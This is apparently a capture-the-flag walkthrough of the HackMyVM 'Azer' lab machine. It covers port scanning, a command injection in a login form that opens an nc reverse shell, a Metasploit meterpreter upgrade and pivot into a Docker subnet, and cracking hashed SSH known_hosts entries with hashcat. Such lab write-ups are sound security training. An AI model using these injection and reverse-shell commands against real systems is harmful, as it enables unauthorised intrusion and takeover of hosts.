Azer - tasiyanci

00. Metainfo

Title: Azer
Author: tasiyanci
Release date: 2024-02-24
Download from: HackMyVM
Level: Easy
System: Linux
You’ll learn: Nc, Docker, ssh-known_hosts

01. Scan

netdiscover -r 172.16.1.0 -P
# _____________________________________________________________________________
#   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
# -----------------------------------------------------------------------------
# 172.16.1.221    08:00:27:44:27:df      1      60  PCS Systemtechnik GmbH

02. Db_nmap

export IP=172.16.1.221
msf6 > db_nmap 172.16.1.221
# [*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-26 17:46 CET
# [*] Nmap: Nmap scan report for azer.lan (172.16.1.221)
# [*] Nmap: Host is up (0.0015s latency).
# [*] Nmap: Not shown: 998 closed tcp ports (reset)
# [*] Nmap: PORT     STATE SERVICE
# [*] Nmap: 80/tcp   open  http
# [*] Nmap: 3000/tcp open  ppp
# [*] Nmap: MAC Address: 08:00:27:44:27:DF (Oracle VirtualBox virtual NIC)
#[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

03. Curl and Nc

Nc

root@kali2023:~/hmv/azer# nc -lvp 12345
# listening on [any] 12345 ...
# connect to [172.16.1.89] from azer.lan [172.16.1.221] 37340
script /dev/null -c bash
# Script started, output log file is '/dev/null'.
azer@azer:~$ ^Z
#[1]+  Stopped             nc -lvp 12345
root@kali2023:~/hmv/azer# stty raw -echo;fg
azer@azer:~$ export TERM=xterm-256color
azer@azer:~$ stty rows 44 columns 185
azer@azer:~$ source /etc/skel/.bashrc
azer@azer:~$ export SHELL=bash

Curl

curl "$IP:3000/login" -d "username=anyuser&password=;nc -c bash 172.16.1.89 12345"

04. Docker

azer@azer:~$ ifconfig br-333bcb432cd5
# br-333bcb432cd5: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
#         inet 10.10.10.1  netmask 255.255.255.0  broadcast 10.10.10.255

azer@azer:~$ ps -efw | grep containerd-shim-runc | grep -v grep
# root         808       1  0 11:32 ?        00:00:01 /usr/bin/containerd-shim-runc-v2 -namespace moby -id a882ee87a64178db21b2950d2a22276231dd5835fb89325b36358f1b158b679b -address /run/containerd/containerd.sock

05. known_hosts (optional)

Bash

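#!/usr/bin/env bash
#Kerszi II.2024
#
# kh-converter.sh: convert the first hashed entry of an OpenSSH known_hosts
# file (written with `HashKnownHosts yes`) into "hash_hex:salt_hex".
#
# A hashed entry has the form
#   |1|<base64 salt>|<base64 hash> <keytype> <key>
# where the hash is HMAC-SHA1 over the hostname, keyed with the salt.
# Only the first such entry is converted; plaintext entries are skipped.
#
# Usage:  kh-converter.sh <known_hosts file>
# Output: one line, "<hash hex>:<salt hex>", on stdout
# Exit:   0 on success; 1 if the file is unreadable, holds no hashed entry
#         or a field does not decode; 2 on a usage error
#
# Defender's note: hashing hides only the hostname text. The HMAC is fast
# and the candidate space for internal addresses is small, so a readable
# known_hosts on a compromised host still reveals internal topology.
# Keeping ~/.ssh at mode 0700 and pruning known_hosts on jump hosts limits
# that exposure.

set -euo pipefail

die() { printf '%s\n' "$*" >&2; exit 1; }

usage() {
  printf 'Usage: %s <known_hosts file>\n' "${0##*/}" >&2
  exit 2
}

[[ $# -eq 1 ]] || usage
[[ -r "$1" ]] || die "cannot read: $1"

# Split on '|': $2 is the "1" marker, $3 the base64 salt and $4 begins with
# the base64 hash. Stop after the first hashed entry so a multi-line file
# does not spill extra fields into the variables.
read -r salt_b64 hash_b64 < <(
  awk -F'|' '$2 == "1" { split($4, a, "[[:space:]]"); print $3 " " a[1]; exit }' "$1"
) || die "no hashed entry found in: $1"

# Decode each base64 field and re-encode it as lowercase hex. Both values
# are 20 bytes in OpenSSH, so each fits on a single xxd -p output line and
# $(...) needs no further cleanup beyond stripping the trailing newline.
salt_hex=$(printf '%s' "$salt_b64" | base64 -d | xxd -p) || die "salt field is not valid base64"
hash_hex=$(printf '%s' "$hash_b64" | base64 -d | xxd -p) || die "hash field is not valid base64"

printf '%s:%s\n' "$hash_hex" "$salt_hex"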
root@kali2023:~/hmv/azer# ./kh-converter.sh known_hosts 
# 4290cd4beec55ae10889aac39e621a3fcb37cd06:040c17649cb2e705905179fbdc533e9d33714d4d

Powershell

.\hashcat.exe -a3 --quiet -O -m160 --hex-salt .\hashe\azer.hash .\masks\ipv4_hcmask.hcmask
# 4290cd4beec55ae10889aac39e621a3fcb37cd06:040c17649cb2e705905179fbdc533e9d33714d4d:10.10.10.10

06. Enumerate IP

Metasploit

# [*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > run -j
# [*] Exploit running as background job 0.
# [*] Exploit completed, but no session was created.

# [*] Started reverse TCP handler on 172.16.1.89:4444 
# msf6 exploit(multi/handler) > [*] Command shell session 1 opened (172.16.1.89:4444 -> 172.16.1.221:34326) at 2024-02-26 19:32:53 +0100

msf6 exploit(multi/handler) > sessions -u 1
# [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

# [*] Upgrading session ID: 1
# [*] Starting exploit/multi/handler
# [*] Started reverse TCP handler on 172.16.1.89:4433 
# [*] Sending stage (1017704 bytes) to 172.16.1.221
# [*] Meterpreter session 2 opened (172.16.1.89:4433 -> 172.16.1.221:34100) at 2024-02-26 19:33:25 +0100
# [*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp 
msf6 auxiliary(scanner/portscan/tcp) > route add 10.10.10.0/24 2
# [*] Route added
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 10.10.10.0/24     # if you already know the target's IP, you can set rhosts to 10.10.10.10 instead
# rhosts => 10.10.10.0/24
msf6 auxiliary(scanner/portscan/tcp) > set ports  22-25,80,110-900
# ports => 22-25,80,110-900
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 100
# THREADS => 100
msf6 auxiliary(scanner/portscan/tcp) > run

# [+] 10.10.10.1:           - 10.10.10.1:80 - TCP OPEN
# [+] 10.10.10.10:          - 10.10.10.10:80 - TCP OPEN

Azer Host

azer@azer:~$ nc -c bash 172.16.1.89 4444 &
# [1] 1071

07. root

# azer@azer:~$ curl 10.10.10.10:80
azer@azer:~$ curl 10.10.10.10:80
# .:.**********.:.
su - root
# .:.**********.:.
